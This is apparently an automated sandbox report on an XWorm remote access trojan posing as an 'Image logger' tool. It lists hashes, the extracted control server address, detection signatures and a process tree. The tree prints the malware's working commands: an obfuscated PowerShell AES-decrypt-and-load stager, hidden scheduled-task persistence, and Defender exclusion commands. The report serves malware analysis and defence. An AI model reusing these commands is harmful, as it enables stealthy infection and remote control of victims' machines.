xworm | ccede6a420c863370c6c292f0cd619230d32eeeb3707b6fe211c0b32e392eea1

Analysis

max time kernel
58s
max time network
106s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
07/09/2024, 17:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Image logger V2.exe
Size

22.7MB
MD5

c30e21a407aa63cb89772314e6c11011
SHA1

99d48227bd3b08749017ac608ee894d5bfeeb5e1
SHA256

ccede6a420c863370c6c292f0cd619230d32eeeb3707b6fe211c0b32e392eea1
SHA512

5d51802c8f16530824472e1c4e52486efa76a1de70f19e01bb3298160d7181a221b0f8e35c11af73d0902b0137e321e7927fb098551a9faf3ca3dd9c6e1286de
SSDEEP

393216:S01mj3xyFGh8aKbd1vq1W1OOde8oBMvC94EOv7NMSWQayvfSwfLoSe:P1C34Q8aKbdJq1dIeHMvC0B5hvKwg

Score

10^/10

xworm defense_evasion evasion execution persistence pyinstaller rat trojan

Malware Config

Extracted

Family

xworm

since-searching.gl.at.ply.gg:64197

Attributes

Install_directory
%ProgramData%
install_file
Helper.exe

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/3260-463-0x000000001B900000-0x000000001B91E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 21 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1684	powershell.exe
4392	powershell.exe
412	powershell.exe
3324	powershell.exe
4628	powershell.exe
3616	powershell.exe
608	powershell.exe
60	powershell.exe
2148	powershell.exe
3396	powershell.exe
2956	powershell.exe
3600	powershell.exe
4436	powershell.exe
4836	powershell.exe
2740	powershell.exe
1984	powershell.exe
4704	powershell.exe
1532	powershell.exe
3132	powershell.exe
4436	powershell.exe
3956	powershell.exe

Disables Task Manager via registry modification
evasion

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 3 IoCs

pid	Process
1836	Dice Roll Cheat.exe
4156	WebhookSpammerV5.exe
3536	Dice Roll Cheat.exe

Loads dropped DLL 4 IoCs

pid	Process
3536	Dice Roll Cheat.exe
3536	Dice Roll Cheat.exe
3536	Dice Roll Cheat.exe
3536	Dice Roll Cheat.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	Image logger V2.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
38	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Detects Pyinstaller 2 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x00080000000234e8-66.dat	pyinstaller
behavioral1/files/0x0007000000023500-199.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2472	timeout.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings	powershell.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
60	schtasks.exe
4916	schtasks.exe
1664	schtasks.exe
972	schtasks.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
412	powershell.exe
412	powershell.exe
3324	powershell.exe
3324	powershell.exe
3324	powershell.exe
4628	powershell.exe
4628	powershell.exe
4628	powershell.exe
3616	powershell.exe
3616	powershell.exe
3616	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	412	powershell.exe
Token: SeDebugPrivilege	3324	powershell.exe
Token: SeIncreaseQuotaPrivilege	3324	powershell.exe
Token: SeSecurityPrivilege	3324	powershell.exe
Token: SeTakeOwnershipPrivilege	3324	powershell.exe
Token: SeLoadDriverPrivilege	3324	powershell.exe
Token: SeSystemProfilePrivilege	3324	powershell.exe
Token: SeSystemtimePrivilege	3324	powershell.exe
Token: SeProfSingleProcessPrivilege	3324	powershell.exe
Token: SeIncBasePriorityPrivilege	3324	powershell.exe
Token: SeCreatePagefilePrivilege	3324	powershell.exe
Token: SeBackupPrivilege	3324	powershell.exe
Token: SeRestorePrivilege	3324	powershell.exe
Token: SeShutdownPrivilege	3324	powershell.exe
Token: SeDebugPrivilege	3324	powershell.exe
Token: SeSystemEnvironmentPrivilege	3324	powershell.exe
Token: SeRemoteShutdownPrivilege	3324	powershell.exe
Token: SeUndockPrivilege	3324	powershell.exe
Token: SeManageVolumePrivilege	3324	powershell.exe
Token: 33	3324	powershell.exe
Token: 34	3324	powershell.exe
Token: 35	3324	powershell.exe
Token: 36	3324	powershell.exe
Token: SeIncreaseQuotaPrivilege	3324	powershell.exe
Token: SeSecurityPrivilege	3324	powershell.exe
Token: SeTakeOwnershipPrivilege	3324	powershell.exe
Token: SeLoadDriverPrivilege	3324	powershell.exe
Token: SeSystemProfilePrivilege	3324	powershell.exe
Token: SeSystemtimePrivilege	3324	powershell.exe
Token: SeProfSingleProcessPrivilege	3324	powershell.exe
Token: SeIncBasePriorityPrivilege	3324	powershell.exe
Token: SeCreatePagefilePrivilege	3324	powershell.exe
Token: SeBackupPrivilege	3324	powershell.exe
Token: SeRestorePrivilege	3324	powershell.exe
Token: SeShutdownPrivilege	3324	powershell.exe
Token: SeDebugPrivilege	3324	powershell.exe
Token: SeSystemEnvironmentPrivilege	3324	powershell.exe
Token: SeRemoteShutdownPrivilege	3324	powershell.exe
Token: SeUndockPrivilege	3324	powershell.exe
Token: SeManageVolumePrivilege	3324	powershell.exe
Token: 33	3324	powershell.exe
Token: 34	3324	powershell.exe
Token: 35	3324	powershell.exe
Token: 36	3324	powershell.exe
Token: SeIncreaseQuotaPrivilege	3324	powershell.exe
Token: SeSecurityPrivilege	3324	powershell.exe
Token: SeTakeOwnershipPrivilege	3324	powershell.exe
Token: SeLoadDriverPrivilege	3324	powershell.exe
Token: SeSystemProfilePrivilege	3324	powershell.exe
Token: SeSystemtimePrivilege	3324	powershell.exe
Token: SeProfSingleProcessPrivilege	3324	powershell.exe
Token: SeIncBasePriorityPrivilege	3324	powershell.exe
Token: SeCreatePagefilePrivilege	3324	powershell.exe
Token: SeBackupPrivilege	3324	powershell.exe
Token: SeRestorePrivilege	3324	powershell.exe
Token: SeShutdownPrivilege	3324	powershell.exe
Token: SeDebugPrivilege	3324	powershell.exe
Token: SeSystemEnvironmentPrivilege	3324	powershell.exe
Token: SeRemoteShutdownPrivilege	3324	powershell.exe
Token: SeUndockPrivilege	3324	powershell.exe
Token: SeManageVolumePrivilege	3324	powershell.exe
Token: 33	3324	powershell.exe
Token: 34	3324	powershell.exe
Token: 35	3324	powershell.exe

Suspicious use of WriteProcessMemory 34 IoCs

description	pid	Process	procid_target
PID 4440 wrote to memory of 4884	4440	Image logger V2.exe	85
PID 4440 wrote to memory of 4884	4440	Image logger V2.exe	85
PID 4884 wrote to memory of 1688	4884	cmd.exe	87
PID 4884 wrote to memory of 1688	4884	cmd.exe	87
PID 1688 wrote to memory of 1108	1688	net.exe	88
PID 1688 wrote to memory of 1108	1688	net.exe	88
PID 4884 wrote to memory of 412	4884	cmd.exe	91
PID 4884 wrote to memory of 412	4884	cmd.exe	91
PID 412 wrote to memory of 3324	412	powershell.exe	99
PID 412 wrote to memory of 3324	412	powershell.exe	99
PID 412 wrote to memory of 624	412	powershell.exe	101
PID 412 wrote to memory of 624	412	powershell.exe	101
PID 624 wrote to memory of 3460	624	WScript.exe	103
PID 624 wrote to memory of 3460	624	WScript.exe	103
PID 3460 wrote to memory of 4088	3460	cmd.exe	105
PID 3460 wrote to memory of 4088	3460	cmd.exe	105
PID 4088 wrote to memory of 1472	4088	net.exe	106
PID 4088 wrote to memory of 1472	4088	net.exe	106
PID 3460 wrote to memory of 4628	3460	cmd.exe	107
PID 3460 wrote to memory of 4628	3460	cmd.exe	107
PID 4628 wrote to memory of 1108	4628	powershell.exe	109
PID 4628 wrote to memory of 1108	4628	powershell.exe	109
PID 4628 wrote to memory of 1836	4628	powershell.exe	111
PID 4628 wrote to memory of 1836	4628	powershell.exe	111
PID 4628 wrote to memory of 4156	4628	powershell.exe	112
PID 4628 wrote to memory of 4156	4628	powershell.exe	112
PID 1836 wrote to memory of 3536	1836	Dice Roll Cheat.exe	114
PID 1836 wrote to memory of 3536	1836	Dice Roll Cheat.exe	114
PID 1108 wrote to memory of 2460	1108	cmd.exe	115
PID 1108 wrote to memory of 2460	1108	cmd.exe	115
PID 2460 wrote to memory of 60	2460	net.exe	145
PID 2460 wrote to memory of 60	2460	net.exe	145
PID 1108 wrote to memory of 3616	1108	cmd.exe	117
PID 1108 wrote to memory of 3616	1108	cmd.exe	117

C:\Users\Admin\AppData\Local\Temp\Image logger V2.exe
"C:\Users\Admin\AppData\Local\Temp\Image logger V2.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4440
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c "Image logger V2.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4884
- - C:\Windows\system32\net.exe
    net file
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1688
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 file
      4⤵
      PID:1108
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pVRq/D+FVfd8+LmCT+JTD5FkmVpVj58PwMuuwejp7A8='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7gZnoVPeTaG83gJkOBv7Nw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $UcjVM=New-Object System.IO.MemoryStream(,$param_var); $xpURH=New-Object System.IO.MemoryStream; $nDXcd=New-Object System.IO.Compression.GZipStream($UcjVM, [IO.Compression.CompressionMode]::Decompress); $nDXcd.CopyTo($xpURH); $nDXcd.Dispose(); $UcjVM.Dispose(); $xpURH.Dispose(); $xpURH.ToArray();}function execute_function($param_var,$param2_var){ $DODmL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KFoJM=$DODmL.EntryPoint; $KFoJM.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Image logger V2.bat';$ADUfX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Image logger V2.bat').Split([Environment]::NewLine);foreach ($fGOOP in $ADUfX) { if ($fGOOP.StartsWith(':: ')) { $bUqWZ=$fGOOP.Substring(3); break; }}$payloads_var=[string[]]$bUqWZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:412
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_515_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_515.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3324
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_515.vbs"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:624
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_515.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3460
      - C:\Windows\system32\net.exe
        
        net file
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4088
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        7⤵
        
        PID:1472
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pVRq/D+FVfd8+LmCT+JTD5FkmVpVj58PwMuuwejp7A8='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7gZnoVPeTaG83gJkOBv7Nw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $UcjVM=New-Object System.IO.MemoryStream(,$param_var); $xpURH=New-Object System.IO.MemoryStream; $nDXcd=New-Object System.IO.Compression.GZipStream($UcjVM, [IO.Compression.CompressionMode]::Decompress); $nDXcd.CopyTo($xpURH); $nDXcd.Dispose(); $UcjVM.Dispose(); $xpURH.Dispose(); $xpURH.ToArray();}function execute_function($param_var,$param2_var){ $DODmL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KFoJM=$DODmL.EntryPoint; $KFoJM.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_515.bat';$ADUfX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_515.bat').Split([Environment]::NewLine);foreach ($fGOOP in $ADUfX) { if ($fGOOP.StartsWith(':: ')) { $bUqWZ=$fGOOP.Substring(3); break; }}$payloads_var=[string[]]$bUqWZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4628
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WebhookSpammerV1.bat" "
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:1108
        
        C:\Windows\system32\net.exe
        
        net file
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:2460
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        9⤵
        
        PID:60
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QnQ+LJ8uABbHbXAO4FuFVPGKynZ/3LF7hH8th9C5LeY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Giel7QVtc7MgczVdodu2Dw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $LluQH=New-Object System.IO.MemoryStream(,$param_var); $RYzDP=New-Object System.IO.MemoryStream; $FvOhk=New-Object System.IO.Compression.GZipStream($LluQH, [IO.Compression.CompressionMode]::Decompress); $FvOhk.CopyTo($RYzDP); $FvOhk.Dispose(); $LluQH.Dispose(); $RYzDP.Dispose(); $RYzDP.ToArray();}function execute_function($param_var,$param2_var){ $oYKjg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ccxBj=$oYKjg.EntryPoint; $ccxBj.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WebhookSpammerV1.bat';$wXwUA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WebhookSpammerV1.bat').Split([Environment]::NewLine);foreach ($wtvna in $wXwUA) { if ($wtvna.StartsWith(':: ')) { $cIlpE=$wtvna.Substring(3); break; }}$payloads_var=[string[]]$cIlpE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3616
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_870_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_870.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1684
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_870.vbs"
        9⤵
        
        PID:1576
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_870.bat" "
        10⤵
        
        PID:4388
        
        C:\Windows\system32\net.exe
        
        net file
        11⤵
        
        PID:2280
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        12⤵
        
        PID:1648
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QnQ+LJ8uABbHbXAO4FuFVPGKynZ/3LF7hH8th9C5LeY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Giel7QVtc7MgczVdodu2Dw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $LluQH=New-Object System.IO.MemoryStream(,$param_var); $RYzDP=New-Object System.IO.MemoryStream; $FvOhk=New-Object System.IO.Compression.GZipStream($LluQH, [IO.Compression.CompressionMode]::Decompress); $FvOhk.CopyTo($RYzDP); $FvOhk.Dispose(); $LluQH.Dispose(); $RYzDP.Dispose(); $RYzDP.ToArray();}function execute_function($param_var,$param2_var){ $oYKjg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ccxBj=$oYKjg.EntryPoint; $ccxBj.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_870.bat';$wXwUA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_870.bat').Split([Environment]::NewLine);foreach ($wtvna in $wXwUA) { if ($wtvna.StartsWith(':: ')) { $cIlpE=$wtvna.Substring(3); break; }}$payloads_var=[string[]]$cIlpE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4392
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WebhookSpammerV1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WebhookSpammerV1.exe"
        12⤵
        
        PID:5008
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAbgB6ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAeAB0ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAcwBvAHIAcgB5ACAAZABvAHcAbgAgAGYAbwByACAAbgBvAHcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGQAaQBlACMAPgA="
        13⤵
        
        PID:1140
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAagBpACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAcQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAbgBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAawB6ACMAPgA="
        13⤵
        
        PID:4556
        
        C:\Windows\Latite_Client_betterV1.exe
        
        "C:\Windows\Latite_Client_betterV1.exe"
        13⤵
        
        PID:1568
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Dice Roll Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Dice Roll Cheat.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1836
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Dice Roll Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Dice Roll Cheat.exe"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3536
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WebhookSpammerV5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WebhookSpammerV5.exe"
        7⤵
        Executes dropped EXE
        
        PID:4156
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WebhookSpammerV5.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3600
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WebhookSpammerV5.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4436
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\WebhookSpammerV5.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4836
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "WebhookSpammerV5" /tr "C:\ProgramData\WebhookSpammerV5.exe"
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:60
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAZwBlACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AdgBlACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAcwBvAHIAcgB5ACAAZABvAHcAbgAgAGYAbwByACAAbgBvAHcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHAAagBzACMAPgA="
        8⤵
        
        PID:4064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAZgBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGMAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGUAZQByACMAPgA="
        8⤵
        
        PID:3980
        
        C:\Windows\Latite_Client_betterV1.exe
        
        "C:\Windows\Latite_Client_betterV1.exe"
        8⤵
        
        PID:4868
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Latite_Client_betterV1.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2148
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Latite_Client_betterV1.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3132
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Latite_Client_betterV1.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2740
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "Latite_Client_betterV1" /tr "C:\ProgramData\Latite_Client_betterV1.exe"
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4916
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
